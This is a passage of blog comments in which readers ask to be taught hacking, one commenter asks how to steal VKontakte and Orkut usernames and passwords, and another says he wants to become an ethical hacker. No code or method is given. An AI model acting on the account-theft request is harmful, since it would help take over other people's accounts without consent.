    i realy want to know how to do hacking. i wanna larn it. if any body want to teach me then plz contect me at my gmail account.
    thanks

  23. sona says:

    plz tell me how to hack vkontakte user name and pw ….. and in orkut too ……..

  24. nilesh says:

    i just want to say i m here for increasing my knowledge, its my aim to became perfect computer administrator well i m hardware engeneer but i have strong desire to became ethical hacker .its my intresting subject so i just want to increase my knowledge from ur support .
